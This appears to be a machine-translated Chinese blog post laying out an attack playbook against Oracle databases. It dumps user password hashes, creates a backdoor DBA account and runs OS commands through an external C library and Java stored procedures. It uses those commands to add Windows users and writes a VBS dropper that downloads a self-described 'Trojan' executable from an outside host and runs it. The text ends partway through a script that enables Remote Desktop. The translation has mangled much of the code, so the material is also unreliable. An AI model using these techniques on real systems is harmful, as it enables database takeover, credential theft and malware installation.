Oracle injection details...

Suran s Blog

Part 1

Basic query command
Program code
Select * from V $ PWFILE_USERS // view dba users
Select * from v $ version // view the oracle version and System version
Select * from session_privs; // view the permissions of the current user
Select * from user_role_privs \ QUERY the current user role
Select * from user_sys_privs \ QUERY the current user's system Permissions

Select username, password from dba_users; // view all user password hash
Select * from dba_sys_privs where grantee = SYSTEM; \ Query SYSTEM Permissions
Grant select any dictionary to system with admin option; \ this permission is required when you cannot log on to the OEM.
Select name, password FROM user $ Where name = SCOTT; // view the password of a single user in earlier versions
Select username, decode (password, NULL, NULL, password) password FROM dba_users; // view User hash
Create user bob identified by iloveyou; \ create user bob password iloveyou
Grant dba to bob; \ grant bob DBA Permissions
Grant execute on xmldom to bob \ to grant the User execute
Create ROLE "javauserpriv" NOT IDENTIFIED
Create ROLE "policyspriv" not identified \ when the prompt role policyspriv does not exist is used
Select grantee from dba_role_privs where granted_role = DBA; \ check that those users have DBA Permissions
Select * from dba_directories; \ view the directory where the path is located

Part 2: create java and execute system commands
Program code
Create or replace library exec_shell AS c: windowssystem32msvcrt. dll;
/
Show errors
Create or replace package when md is procedure exec (character string in char );
End transaction md;
/
Show errors
Create or replace package body already MD IS
PROCEDURE exec (Response string in char)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
Language c;
End transaction md;
/
Show errors

There is no echo above

If not, use the following
Program code
Create or replace library exec_shell AS $ ORACLE_HOMEmsvcrt.dll;
/
Show errors
Create or replace package when md is procedure exec (character string in char );
End transaction md;
/
Show errors
Create or replace package body already MD IS
PROCEDURE exec (Response string in char)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
Language c;
End transaction md;
/
Show errors

After execution
Run
Program code
Exec cmdmd.exe c (net1 user robert iloveyou/add );

NO2.
Program code
Create or replace and compile java source named "Host"
Import java. io .*;
Public class Host {
Public static void executeCommand (String command ){
Try {
String [] finalCommand;
If (isWindows ()){
FinalCommand = new String [4];
// Use the appropriate path for your windows version.
FinalCommand [0] = "C: \ windows \ system32 \ cmd.exe"; // Windows XP/2003
// FinalCommand [0] = "C: \ winnt \ system32 \ cmd.exe"; // Windows NT/2000
FinalCommand [1] = "/y ";
FinalCommand [2] = "/c ";
FinalCommand [3] = command;
}
Else {
FinalCommand = new String [3];
FinalCommand [0] = "/bin/sh ";
FinalCommand [1] = "-c ";
FinalCommand [2] = command;
}

Final Process pr = runtime.getruntime(cmd.exe c (finalCommand );
Pr. waitFor ();

New Thread (new Runnable (){
Public void run (){
BufferedReader br_in = null;
Try {
Br_in = new BufferedReader (new InputStreamReader (pr. getInputStream ()));
String buff = null;
While (buff = br_in.readLine ())! = Null ){
System. out. println ("Process out:" + buff );
Try {Thread. sleep (100);} catch (Exception e ){}
}
Br_in.close ();
}
Catch (IOException ioe ){
System. out. println ("Exception caught printing process output .");
Ioe. printStackTrace ();
}
Finally {
Try {
Br_in.close ();
} Catch (Exception ex ){}
}
}
}). Start ();

New Thread (new Runnable (){
Public void run (){
BufferedReader br_err = null;
Try {
Br_err = new BufferedReader (new InputStreamReader (pr. getErrorStream ()));
String buff = null;
While (buff = br_err.readLine ())! = Null ){
System. out. println ("Process err:" + buff );
Try {Thread. sleep (100);} catch (Exception e ){}
}
Br_err.close ();
}
Catch (IOException ioe ){
System. out. println ("Exception caught printing process error .");
Ioe. printStackTrace ();
}
Finally {
Try {
Br_err.close ();
} Catch (Exception ex ){}
}
}
}). Start ();
}
Catch (Exception ex ){
System. out. println (ex. getLocalizedMessage ());
}
}

Public static boolean isWindows (){
If (System. getProperty ("OS. name"). toLowerCase (). indexOf ("windows ")! =-1)
Return true;
Else
Return false;
}

};
/
Create or replace procedure host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME Host.exe cuteCommand (java. lang. String );
/
EXEC DBMS_JAVA.grant_permission (SYSTEM, java. io. FilePermission, <>, read, write, execute, delete );
EXEC Dbms_Java.Grant_Permission (SYSTEM, SYS: java. lang. RuntimePermission, writeFileDescriptor ,);
EXEC Dbms_Java.Grant_Permission (SYSTEM, SYS: java. lang. RuntimePermission, readFileDescriptor ,);
/
DECLARE
Rochelle output DBMS_OUTPUT.chararr;
Rochelle lines INTEGER: = 1000;
BEGIN
DBMS_OUTPUT.enable (1000000 );
DBMS_JAVA.set_output (1000000 );

Host_command (dir C :);

DBMS_OUTPUT.get_lines (l_output, l_lines );
END;

Pay attention to two points.
Pay attention to the system path under win
Note that win is commented out in linx.
The last sentence is the Command Execution
Program code
Host_command (dir C :);

No3.
Program code
Create or replace and compile
Java souRCe named "util"
As
Import java. io .*;
Import java. lang .*;
Public class util extends Object
{
Public static int RunThis (String args)
{
Runtime rt = Runtime. getRuntime ();
Int RC =-1;
Try
{
Process p = rt.exe c (args );
Int bufSize = 4096;
BufferedInputStream bis = new BufferedInputStream (p. getInputStream (), bufSize );
Int len;
Byte buffer [] = new byte [bufSize];
// Echo back what the program spit out
While (len = bis. read (buffer, 0, bufSize ))! =-1)
System. out. write (buffer, 0, len );
RC = p. waitFor ();
}
Catch (Exception e)
{
E. printStackTrace ();
RC =-1;
}
Finally
{
Return RC;
}
}
}
/
Create or replace
Function RUN_CMz (p_cmd in varchar2) return number
As
Language java
Name util. RunThis (java. lang. String) return integer;
/
Create or replace procedure RC (p_cmd in varChar)
As
X number;
Begin
X: = RUN_CMz (p_cmd );
End;
/
Variable x number;
Set serveroutput on;
Exec dbms_java.set_output (100000 );
Grant policyspriv to system;

At last, we need to authorize the current login user.
Program code
Grant policyspriv to system

Last executed
Program code
Exec: x: = run_cmz (ipconfig );

Part 2 Operating Disk Files
No1.
Create directory
Program code
Create or replace directory DIR as C :;
This directory can also be a startup directory.

Authorization
Program code
Grant read, write on directory DIR to system

This step does not need to be used.
Then execute the operation
Write files
Program code
Declare
File utl_file.file_type;
Begin
File: = utl_file.fopen (DIR, test. vbs, W );
Utl_file.put_line (file, Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http: // blog.cnmoker.org/rad.exe", 0
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile "c: ad.exe", 2 );
Utl_file.fflush (file );
Utl_file.fclose (file );
End;
/
Exec: x: = run_cmz (cscript c: est. vbs );
/
Exec: x: = run_cmz (c: ad.exe );

In this step, download my Trojan to drive C and execute
Program code
Declare
File utl_file.file_type;
Begin
File: = utl_file.fopen (DIR, 3389.vbs, W );
Utl_file.put_line (file, Dim OperationRegistry
Set OperationRegistry = WScript. createObject ("WScript. Shell ")
Dim TSPort, TSState, TSRegPath
TSRegPath = "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber"
TSPort = OperationRegistry. RegRead (TSRegPath)
TSRegPath = "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetCon